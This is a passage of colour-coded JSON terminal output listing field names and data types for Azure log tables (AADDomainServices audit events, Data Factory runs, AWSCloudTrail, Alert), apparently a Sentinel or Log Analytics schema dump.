\u001b[94m\"SubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLinkedLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetServerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TdoSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TransmittedServices\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VirtualAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkstationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesPolicyChange\"\u001b[39;49;00m: {\n        \u001b[94m\"AccessGranted\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccessRemoved\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditPolicyChanges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CollisionTargetName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CollisionTargetType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CrashOnAuditFailValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DisabledPrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DnsName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainBehaviorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainPolicyChanged\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EnabledPrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EntryType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Flags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ForceLogoff\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForestRoot\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForestRootSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HandleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KerberosPolicyChange\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutDuration\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutObservationWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutThreshold\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineAccountQuota\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaxPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MixedDomainMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetbiosName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewSd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OemInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldSd\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordHistoryLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidFilteringEnabled\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TdoAttributes\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TdoDirection\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TdoType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TopLevelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesPrivilegeUse\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewState\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceManager\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TransactionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AADDomainServicesSystemSecurity\"\u001b[39;49;00m: {\n        \u001b[94m\"AuditsDiscarded\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RecordId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFActivityRun\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityIterationCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityRunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EffectiveIntegrationRuntime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"End\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Error\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Input\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkedServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Output\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineRunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFPipelineRun\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"End\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PipelineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Predecessors\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RunId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SystemParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ADFTriggerRun\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Parameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Start\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SystemParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerEvent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerFailureType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AWSCloudTrail\"\u001b[39;49;00m: {\n        \u001b[94m\"APIVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AWSRegion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalEventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AwsEventId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AwsRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementEvent\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReadOnly\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"RecipientAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resources\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResponseElements\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceEventDetails\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionCreationDate\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerArn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerPrincipalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionIssuerUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionMfaAuthenticated\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SharedEventId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityAccessKeyId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityAccountId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityArn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityInvokedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityPrincipalid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserIdentityUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VpcEndpointId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Alert\"\u001b[39;49;00m: {\n        \u001b[94m\"AlertContext\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertError\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertPriority\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertRuleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertRuleInstanceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertStatus\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AlertTypeDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertTypeNumber\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AlertValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Comments\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom10\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom7\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom8\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Custom9\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Expression\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Flags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlagsDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastModifiedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LinkToSearchResults\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PriorityNumber\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Query\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QueryExecutionEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"QueryExecutionStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationJobId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationRunbookName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RepeatCount\"\u001b[39;49;00m: 